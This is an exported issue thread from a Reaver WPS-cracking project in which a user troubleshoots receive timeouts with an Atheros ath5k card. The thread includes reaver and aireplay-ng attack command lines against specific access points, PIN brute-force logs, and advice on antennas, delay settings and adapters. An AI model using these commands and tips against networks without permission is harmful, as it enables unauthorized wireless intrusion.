search

amanojha / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

receive timeout (0x02) with WG511T ( Atheros ath5k ) #322

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago 
A few things to consider before submitting an issue:

0. We write documentation for a reason, if you have not read it and are
having problems with Reaver these pages are required reading before
submitting an issue:
http://code.google.com/p/reaver-wps/wiki/HintsAndTips
http://code.google.com/p/reaver-wps/wiki/README
http://code.google.com/p/reaver-wps/wiki/FAQ
http://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers
1. Reaver will only work if your card is in monitor mode.  If you do not
know what monitor mode is then you should learn more about 802.11 hacking
in linux before using Reaver.
2. Using Reaver against access points you do not own or have permission to
attack is illegal.  If you cannot answer basic questions (i.e. model
number, distance away, etc) about the device you are attacking then do not
post your issue here.  We will not help you break the law.
3. Please look through issues that have already been posted and make sure
your question has not already been asked here: http://code.google.com/p
/reaver-wps/issues/list
4. Often times we need packet captures of mon0 while Reaver is running to
troubleshoot the issue (tcpdump -i mon0 -s0 -w broken_reaver.pcap).  Issue
reports with pcap files attached will receive more serious consideration.

Answer the following questions for every issue submitted:

0. What version of Reaver are you using?  (Only defects against the latest 
version will be considered.)
   reaver 1.4 and 

1. What operating system are you using 

   BT4 R2 and  WG511T 108 Mbps Wireless PC Card 
           wlan1           Atheros         ath5k - [phy1]
                                                   (monitor mode enabled on mon0)

2. Is your wireless card in monitor mode (yes/no)?  Yes.  Injection is working, 
Yes

3. What is the signal strength of the Access Point you are trying to crack?

Range tried varies between -67.

5. What is the entire command line string you are supplying to reaver?
 reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

1. run: aireplay-ng mon0 -1 120 -a 68:7F:74:E2:4A:1C -e kitty-Home
2. then: reaver -i mon0 -A -b 68:7F:74:E2:4A:1C -c 6 -vv --no-nacks --win7

reaver -A -b 00:1C:DF:XX:XX:XX -c 6 -vv -i mon0 --dh-small --no-nacks 
--ignore-locks --win7 -d 15

 WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 0.08% complete @ 2012-01-26 01:00:17 (0 seconds/pin)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: 10 failed connections in a row

[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: xxxx
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: xxxx
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: xxxx
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: xxxx

any help or points that would be very much apprecaited

Original issue reported on code.google.com by zerr...@gmail.com on 3 Jun 2012 at 10:04

GoogleCodeExporter commented 8 years ago 
ok sorry about that here is the .pcap file i recorded using Wireshark

http://www.sendspace.com/file/31quhy

Original comment by zerr...@gmail.com on 3 Jun 2012 at 10:54

GoogleCodeExporter commented 8 years ago 
If I was in your shoes, I would do the following:
1. Get closer/get bigger antenna. ## In my experience with Reaver, this happens 
when the AP can't hear you well.
2. Play with the settings of Reaver, those that delay the sending of the M 
messages from Reaver to the AP. 

Regarding the association problem - no idea. Let the target rest for 10 minutes 
and play with the other neighbors and try again.  
:)

Original comment by BHT...@gmail.com on 3 Jun 2012 at 2:05

GoogleCodeExporter commented 8 years ago 
Hi

Thanks for your reply what do you think about WG511T ( Atheros ath5k
drivers )
is it compatible with reaver running on BT4

Original comment by zerr...@gmail.com on 4 Jun 2012 at 4:52

GoogleCodeExporter commented 8 years ago 
[deleted comment]
GoogleCodeExporter commented 8 years ago 
Well,
here you go.
http://www.backtrack-linux.org/wiki/index.php/Wireless_Drivers
IF this card has a chipset that is listed there - it will work with Backtrack.
If you are not buying it, just try and see if it works. 
I am using one of those: 
http://www.ebay.com/itm/Double-Dual-6dbi-Antennas-High-Power-150M-Wireless-Wifi-
Adapter-Ralink3070-New-/280837286954?pt=US_USB_Wi_Fi_Adapters_Dongles&hash=item4
16334ec2a
which has a Ralink RT2870/3070 chipset with BT 5 R2. I has been working 
flawlessly for 30 days now. It haven't stopped it cracking those PINs :D

Original comment by BHT...@gmail.com on 4 Jun 2012 at 7:39

GoogleCodeExporter commented 8 years ago 
Hi

Thanks for quick reply
have found only this *
Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express)
(rev 01) - using the mac80211 ath9k drivers-passe

*But mine is WG511T ( Atheros ath5k ) which means is not going to work l
suspect
and if l get this EDUP-EP-MS1532-Wireless-300-Mbps-USB-Network-Card-Adapter
does it work backtrack4 R2 with reaver 1.4 running

Original comment by zerr...@gmail.com on 4 Jun 2012 at 8:33

GoogleCodeExporter commented 8 years ago 
It works with backtrack5 R2 for sure. can't say about BT4. But you can just 
download BT5r2 :)

Original comment by BHT...@gmail.com on 4 Jun 2012 at 8:43

GoogleCodeExporter commented 8 years ago 
Yes thanks but l have BT4 install in my partition  hard disk
can upgrade to BT5 l have it on ISO format

cheers :-))

Original comment by zerr...@gmail.com on 4 Jun 2012 at 8:48